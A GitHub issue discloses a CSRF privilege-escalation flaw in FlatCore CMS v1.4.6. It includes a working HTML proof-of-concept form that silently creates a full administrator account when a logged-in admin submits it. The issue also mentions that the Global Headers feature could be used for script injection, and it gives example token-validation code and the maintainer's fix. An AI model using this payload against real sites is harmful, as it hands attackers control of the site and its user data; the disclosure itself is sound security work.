This repository has been archived by the owner on Jan 5, 2023. It is now read-only.

CSRF Privilege Escalation (Creation of an administrator account) on FlatCore v1.4.6 #27

Closed
shardulm94 opened this issue Apr 8, 2017 · 2 comments

Comments

@shardulm94

Exploit Title: CSRF Privilege Escalation (Creation of an administrator account) on FlatCore v1.4.6
Date: 08-April-2017
Exploit Author: @shardulm94
Software Link: https://github.com/flatCore/flatCore-CMS/archive/v1.4.6.zip
Version: 1.4.6

Description:
Using Cross-Site Request Forgery (CSRF), an attacker can force a user who is currently authenticated with a web application to execute an unwanted action. The attacker can trick the user into loading a page which may send a request to perform the unwanted action in the background. In the case of FlatCore, we can use CSRF to perform actions on the admin dashboard by targeting an administrator.

Exploit:
We assume that FlatCore is installed at http://localhost/. Our target is acp/acp.php?tn=user&sub=new&edituser= which is the page used to create a new user. The given POC will create a user on the website which has full administrator privileges.

<html>
<body>
    <form method="POST" action="http://localhost/acp/acp.php?tn=user&sub=new&edituser=">
        <input type="hidden" name="user_nick" value="testcsrf" />
        <input type="hidden" name="user_registerdate" value="" />
        <input type="hidden" name="user_verified" value="verified" />
        <input type="hidden" name="nbr_of_groups" value="0" />
        <input type="hidden" name="user_newsletter" value="none" />
        <input type="hidden" name="user_firstname" value="" />
        <input type="hidden" name="user_lastname" value="" />
        <input type="hidden" name="user_mail" value="csrf@csrf.com" />
        <input type="hidden" name="user_company" value="" />
        <input type="hidden" name="user_street" value="" />
        <input type="hidden" name="user_street_nbr" value="" />
        <input type="hidden" name="user_zipcode" value="" />
        <input type="hidden" name="user_city" value="" />
        <input type="hidden" name="user_psw_new" value="test" />
        <input type="hidden" name="user_psw_reconfirmation" value="test" />
        <input type="hidden" name="user_psw" value="" />
        <input type="hidden" name="drm_acp_class" value="administrator" />
        <input type="hidden" name="drm_acp_pages" value="drm_acp_pages" />
        <input type="hidden" name="drm_acp_editpages" value="drm_acp_editpages" />
        <input type="hidden" name="drm_acp_editownpages" value="drm_acp_editownpages" />
        <input type="hidden" name="drm_acp_files" value="drm_acp_files" />
        <input type="hidden" name="drm_acp_user" value="drm_acp_user" />
        <input type="hidden" name="drm_acp_system" value="drm_acp_system" />
        <input type="hidden" name="drm_moderator" value="drm_moderator" />
        <input type="hidden" name="drm_can_publish" value="drm_can_publish" />
        <input type="hidden" name="save_the_user" value="Save User" />
        <input type="submit" value="Submit!" />
    </form>
</body>
</html>

Before running the POC, make sure you are logged in to an administrator account. Then open the HTML file and submit the form. The new user with admin rights should now have been created.

References:
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
https://www.owasp.org/index.php/Testing_for_Privilege_escalation_(OTG-AUTHZ-003)

Screenshots (images not included on this page): before the exploit; exploit page; after submitting the form; new user added; with admin access.

Impact: Compromises the entire web application and user data
Mitigation: Use of CSRF tokens

Creation of a user account was just an example. Other pages/settings in the admin dashboard are also vulnerable to CSRF. For example, the Global Headers (HTML) feature can be misused to inject JS into the website.
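The mitigation named above (a per-session CSRF token that every state-changing /acp/ request must carry) as an added example; this is not FlatCore's code nor the maintainer's fix, and the in-memory session store, the csrf_token field name and the handle_create_user stand-in for acp.php are assumptions. The forged request from the PoC carries the victim's cookie but cannot carry the token, so it is rejected.

```python
import hmac
import secrets
from typing import Optional

# Constructed in-memory session store: session_id -> session data (assumption).
SESSIONS: dict = {}

def new_session(user: str, role: str) -> str:
    """Create a login session and mint a random CSRF token bound to it."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "role": role,
                     "csrf_token": secrets.token_urlsafe(32)}
    return sid

def csrf_token_for(session_id: str) -> str:
    """Token the server embeds in each /acp/ form it renders for this session."""
    return SESSIONS[session_id]["csrf_token"]

def hidden_token_field(session_id: str) -> str:
    """Hidden input to place inside every state-changing form."""
    return (f'<input type="hidden" name="csrf_token" '
            f'value="{csrf_token_for(session_id)}" />')

def csrf_valid(session_id: str, submitted: Optional[str]) -> bool:
    """Constant-time check that the submitted token matches the session's token."""
    sess = SESSIONS.get(session_id)
    if sess is None or not submitted:
        return False
    return hmac.compare_digest(sess["csrf_token"], submitted)

def handle_create_user(session_id: str, form: dict) -> tuple:
    """Hypothetical stand-in for acp.php?tn=user&sub=new; returns (status, message).

    The cookie (session_id) is sent automatically by the browser on a cross-site
    POST, so the authorization check alone does not stop the PoC; the token does.
    """
    sess = SESSIONS.get(session_id)
    if sess is None or sess["role"] != "administrator":
        return (403, "not an administrator")
    if not csrf_valid(session_id, form.get("csrf_token")):
        return (403, "missing or invalid CSRF token")
    return (200, f"created user {form['user_nick']} "
                 f"with class {form['drm_acp_class']}")
```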

@patkon
Member

patkon commented Apr 8, 2017

Woah. Thank you for the detailed description. I'll try to fix that as soon as possible.

@patkon
Member

patkon commented Apr 12, 2017

All forms in /acp/ now use CSRF token.
9a5e2c4
